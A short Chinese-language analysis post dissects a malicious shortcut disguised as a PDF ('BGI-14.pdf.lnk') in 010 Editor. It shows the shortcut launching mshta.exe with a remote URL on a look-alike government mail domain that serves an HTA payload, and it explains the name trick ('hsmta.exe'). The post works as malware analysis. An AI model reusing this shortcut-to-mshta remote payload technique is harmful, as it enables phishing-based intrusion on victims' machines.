BGI-14.pdf.lnk
*.lnk使用010 Editor打开,选择“打开LNK文件”:
LNK文件结构
| struct ShellLinkHeader sShellLinkHeader | 0h | 4Ch | Fg: Bg:0x95E8FF | |
|---|---|---|---|---|
| struct LinkTargetIDList sLinkTargetIDList | CLSID_MyComputer\C:\Windows\System32\mshta.exe | 4Ch | 131h | Fg: Bg: |
| struct LinkInfo sLinkInfo | 17Dh | 4Ch | Fg: Bg:0x95E8FF | |
| struct StringData RELATIVE_PATH | ..\..\..\..\Windows\System32\mshta.exe | 1C9h | 4Eh | Fg: Bg: |
| struct StringData WORKING_DIR | %windir% | 217h | 12h | Fg: Bg:0x95E8FF |
| struct StringData COMMAND_LINE_ARGUMENTS | https://mailmofagovpk.cdn-pak.net/2494/1/50382/2/0/0/1836338576/files-bf3af810/hta | 229h | A6h | Fg: Bg: |
| struct StringData ICON_LOCATION | %windir%\System32\shell32.dll | 2CFh | 3Ch | Fg: Bg:0x95E8FF |
| struct ExtraData sExtraData | 30Bh | 5A4h | Fg: Bg: |
为什么“hsmta.exe”等价于“mshta.exe”
sLinkTargetIDList
string PrimaryName:hsmta.exe
struct ExtraDataBlock ExtraBlock:mshta.exe
链接文件中的最终结构是 EXTRA_DATA 结构,它包含有关链接目标的所有其他补充信息。 当链接目标也具有相应的环境变量时,EnvironmentVariableDataBlock结构很有用
RELATIVE_PATH
如果在LinkFlags中设置了HasWorkingDir和HasRelativePath属性,您将能够在此结构中看到链接目标的工作目录和相对路径。
若有收获,就点个赞吧
0 人点赞
